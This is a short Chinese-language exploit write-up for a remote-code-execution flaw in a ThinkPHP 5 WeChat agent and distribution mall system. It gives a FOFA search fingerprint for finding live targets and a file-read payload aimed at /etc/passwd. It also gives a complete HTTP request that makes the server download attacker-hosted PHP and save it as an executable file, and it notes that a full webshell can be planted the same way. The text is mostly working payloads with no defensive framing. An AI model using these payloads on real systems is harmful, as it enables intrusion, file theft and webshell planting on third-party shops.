记一次RCE漏洞的利用

某微商代理商补货商城系统存在RCE漏洞

微商分销代理商城，可以自己设置代理等级和升级条件(如购买指定商品、消费额度)，“微商城+小程序+三级分销+拼团秒杀+多商户开店+O2O门店”通过社交关系分销裂变，把粉丝变成客户，让分销商发展下线，打造新型社交分销模式，实现人人分销、人人卖货！

FOFA

"/template/mobile/new/static/assets/js/comm.js"

框架:ThinkPHP 5

Payload:

/Mobile/address/curl_request?url=file:///etc/passwd

前台远程文件写入漏洞(RCE)

位于 /home/controller/Index.php 控制器的 Test方法先通过curl_exec函数将远程文件下载过来，然后通过fopen 直接写入到指定的文件当中，文件名可随意控制，导致漏洞产生.

// 下载图片
public function dlfile($file_url, $save_to)
{$ch = curl_init();curl_setopt($ch, CURLOPT_POST, 0);curl_setopt($ch,CURLOPT_URL,$file_url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$file_content = curl_exec($ch);curl_close($ch);$downloaded_file = fopen($save_to, 'w');fwrite($downloaded_file, $file_content);fclose($downloaded_file);}

先在云服务器或VPS上准备一个111.txt 内容为 <?php phpinfo();?> 然后使其能被访问到，之后将下方Paylaod地址替换即可

Payload:

GET /home/test/dlfile?file_url=http://127.0.0.1/111.txt&save_to=1.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Host: 127.0.0.1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

文件会写入到1.php中

同理直接下载大马文件写入也是一样